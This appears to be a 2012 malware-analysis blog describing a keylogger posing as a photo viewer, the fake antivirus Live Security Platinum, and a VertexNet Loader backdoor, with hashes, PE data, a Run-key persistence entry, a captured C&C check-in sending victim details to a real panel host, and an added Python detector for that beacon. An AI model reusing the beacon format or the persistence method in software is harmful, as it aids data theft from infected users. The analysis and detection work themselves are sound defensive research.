MalwareDisasters is a division of MalwareIntelligence. It captures information about the behavior of malicious code during testing and also offers the countermeasures needed to mitigate the malicious actions in question.

7.19.2012

I give you a picture and you give me your private data! What do you say?


MD5 :  bf25f7588c58cd4b7cc5ac04ebfd00c5
SHA1:  1c8e7315fae2a2af199bc3d79a5fec5cc8de4f79
['Microsoft Visual Basic v5.0 - v6.0']

PE Information
     Win32 Executable Microsoft Visual Basic 6 (86.2%)
     Win32 Executable Generic (5.8%)
     Win32 Dynamic Link Library (generic) (5.1%)
     Generic Win/DOS Executable (1.3%)
     DOS Executable Generic (1.3%)


     Optional Header: 0x400000
     Address Of Entry Point: 0x1b04
     Compile Time: 2012-01-25 10:58:42
     Number of RVA and Sizes: 16
     DLL: False
     Number of Sections: 3


[IMAGE_RESOURCE_DIRECTORY]
     0x2B000    0x0   Characteristics: 0x0       
     0x2B004    0x4   TimeDateStamp: 0x4F1FFC81 [Wed Jan 25 12:58:41 2012 UTC]
     0x2B008    0x8   MajorVersion: 0x0       
     0x2B00A    0xA   MinorVersion: 0x0       
     0x2B00C    0xC   NumberOfNamedEntries: 0x0       
     0x2B00E    0xE   NumberOfIdEntries: 0x3  


Metadata
     Translation: 0x0409 0x04b0
     InternalName: Photo_Viewer_12_south
     FileVersion: 12.00
     CompanyName: ACDSee Image Viewer
     ProductName: My_Photos
     ProductVersion: 12.00
     OriginalFilename: Photo_Viewer_12_south.exe

Registry
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
NTS ACDSee Image Viewer c:\windows\system32\wpowercfg.exe

VT detection rate 19/37

The malware has keylogging functionality. All captured information is sent via SMTP, and on execution it displays an image:


Do you know this girl? :-)


Alex


7.13.2012

New variant of another fake antivirus program called Live Security Platinum


This is the icon used for the fakeAV


Technical information & PE file attributes
MD5 :  8ed72a01f6dd01cf353091492d7e96c6
SHA1:  a810430d6d26e97b1a8b48898d8effe4ed8a140e
['Microsoft Visual C++ v6.0'], ['Microsoft Visual C++ 5.0'], ['Microsoft Visual C++'], ['Microsoft Visual C++ v6.0'], ['Installer VISE Custom']


PE information & sections:      
      Win32 Executable MS Visual C++ (generic) (65.2%)
      Win32 Executable Generic (14.7%)
      Win32 Dynamic Link Library (generic) (13.1%)
      Generic Win/DOS Executable (3.4%)
      DOS Executable Generic (3.4%)


     Optional Header: 0x400000
     Address Of Entry Point: 0x1953
     Compile Time: 2012-07-12 09:06:36
     Number of RVA and Sizes: 16
     Number of Sections: 4


Imported DLLs and API:
[1] KERNEL32.dll     
     0x407000 Sleep
     0x407004 CloseHandle
     0x407008 GetProcAddress
     0x40700c GetModuleHandleA
     0x407010 InterlockedExchange
     0x407014 SetEvent
     0x407018 CreateFileA
     0x40701c VirtualAllocEx
     0x407020 LCMapStringA
     0x407024 GetStringTypeW
     0x407028 GetStringTypeA
     0x40702c MultiByteToWideChar
     0x407030 RaiseException
     0x407034 LoadLibraryA
     0x407038 GetOEMCP
     0x40703c GetStartupInfoA
     0x407040 GetCommandLineA
     0x407044 GetVersion
     0x407048 ExitProcess
     0x40704c HeapFree
     0x407050 TerminateProcess
     0x407054 GetCurrentProcess
     0x407058 UnhandledExceptionFilter
     0x40705c GetModuleFileNameA
     0x407060 FreeEnvironmentStringsA
     0x407064 FreeEnvironmentStringsW
     0x407068 WideCharToMultiByte
     0x40706c GetEnvironmentStrings
     0x407070 GetEnvironmentStringsW
     0x407074 SetHandleCount
     0x407078 GetStdHandle
     0x40707c GetFileType
     0x407080 HeapDestroy
     0x407084 HeapCreate
     0x407088 VirtualFree
     0x40708c RtlUnwind
     0x407090 WriteFile
     0x407094 HeapAlloc
     0x407098 VirtualAlloc
     0x40709c HeapReAlloc
     0x4070a0 GetCPInfo
     0x4070a4 GetACP
     0x4070a8 LCMapStringW
[2] USER32.dll       
     0x4070b0 LoadBitmapA
     0x4070b4 ShowWindow
     0x4070b8 LoadImageA
     0x4070bc LoadIconA
[3] WINMM.dll        
     0x4070c4 mixerGetControlDetailsA


VT information about detection rate 22/42


Live Security Platinum screenshots
Warning popups


Live Security Platinum GUI:





Live Security Platinum monetization

Live Security Platinum registration

** Information obtained through the automated malware analysis process of the CrimewareAttack Service (by MalwareIntelligence).

Alex




7.06.2012

Generic backdoor-type trojan built with the popular crimeware “Loader”

This is the icon used for this malware.


Technical information & PE file attributes
MD5 :  aab21e11953aee66ff16772576ceaec0
SHA1:  576910d3ae484144db32dd835594c605dac90a9d
['Microsoft Visual C++ 8'], ['VC8 -> Microsoft Corporation']


This malware was created with, and is spread through, the crimeware "VertexNet Loader".


PE information & sections:
     57.9% (.EXE) Win32 Executable MS Visual C++ (generic) (31206/45/13)
     12.2% (.DLL) Win32 Dynamic Link Library (generic) (6581/28/2)
     12.0% (.EXE) Win32 Executable Generic (6514/8/2)
     10.3% (.EXE) Win64 Executable Generic (5563/38/1)
     3.7% (.EXE) Generic Win/DOS Executable (2002/3)


Mutex: VN_MUTEX16
Optional Header: 0x400000
Address Of Entry Point: 0xaf4a
Compile Time: 2011-06-20 11:05:05
Number of RVA and Sizes: 16
Number of Sections: 5


API Functions:

     InternetReadFile
     CreateProcess
     WinExec
     ShellExecute
     URLDownloadToFileA

VT information about detection rate 35/42 


VN_MUTEX16 is the default mutex string set by the internal builder (constructor) of VertexNet Loader:

This information corresponds to the default settings used when the bot is created through that internal builder:


Report about the infected machine in the C&C statistics panel:


This information is inserted into the crimeware's database (MySQL by default). The check-in that carries it can be seen in the C&C traffic capture:

GET /x1/adduser.php?uid={52bacd1a-7586-11e0-a813-xxxxxxxxxxxx--1962905967}&lan=XXX.XXX.XXX.XXX&cmpname=XXXXXXXXXX-59903E%20[Administrator]&country= &idle=0&ver=v1.2 HTTP/1.1
User-Agent: V32
Host: tinker.vn
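Because this check-in has a fixed shape (a request to adduser.php carrying uid, lan, cmpname and ver parameters, sent with the hard-coded User-Agent "V32"), it can be flagged in proxy or HTTP logs. The following detector is an added example written for this post, not code from the crimeware or from MalwareIntelligence; the capture it scans is constructed from the request shown above, and the set of required parameters is an assumption drawn from that single request.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Constructed sample (not the page's pcap): the check-in from the post,
# re-joined onto one request line, plus a benign request that must not match.
SAMPLE_CAPTURE = """\
GET /x1/adduser.php?uid={52bacd1a-7586-11e0-a813-xxxxxxxxxxxx--1962905967}&lan=XXX.XXX.XXX.XXX&cmpname=XXXXXXXXXX-59903E%20[Administrator]&country= &idle=0&ver=v1.2 HTTP/1.1
User-Agent: V32
Host: tinker.vn

GET /index.html HTTP/1.1
User-Agent: Mozilla/5.0
Host: www.example.com
"""

REQUEST_LINE = re.compile(r"^(GET|POST) (.+) HTTP/1\.[01]$")
# Parameters the default check-in carries (assumed from the single capture above).
CHECKIN_PARAMS = {"uid", "lan", "cmpname", "ver"}

def split_requests(capture):
    """Split a plain-text capture into (request line, lower-cased header dict) pairs."""
    out = []
    for block in re.split(r"\n\s*\n", capture.strip()):
        lines = block.splitlines()
        headers = {}
        for h in lines[1:]:
            name, _, value = h.partition(":")
            headers[name.strip().lower()] = value.strip()
        out.append((lines[0], headers))
    return out

def match_vertexnet_checkin(request_line, headers):
    """Return the parsed beacon fields, or None if the request is not a VertexNet check-in."""
    m = REQUEST_LINE.match(request_line)
    if not m:
        return None
    target = urlsplit(m.group(2))          # the target may contain a raw space (see country=)
    params = {k: v[0] for k, v in parse_qs(target.query, keep_blank_values=True).items()}
    if not target.path.endswith("/adduser.php") or not CHECKIN_PARAMS.issubset(params):
        return None
    return {"host": headers.get("host", ""), "user_agent": headers.get("user-agent", ""),
            "uid": params["uid"], "cmpname": params["cmpname"], "ver": params["ver"]}

def scan_capture(capture):
    """Run the matcher over every request in the capture and return the hits."""
    hits = [match_vertexnet_checkin(line, hdrs) for line, hdrs in split_requests(capture)]
    return [h for h in hits if h]
```

A hit whose user_agent is "V32" and whose host matches the known panel is a high-confidence match; the parameter shape alone is still useful when the operator changes the User-Agent string.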

You can read more about this crimeware's functions, commands and the data it extracts from infected machines in the MalwareIntelligence post: VertexNetLoader crimeware timeline, popular functions and marketing scheme


VertexNet Loader crimeware C&C
In this case, the malware's control panel is hosted at hxxp://tinker.vn/x1/


** Information obtained through the automated malware analysis process of the CrimewareAttack Service (by MalwareIntelligence).

Alex
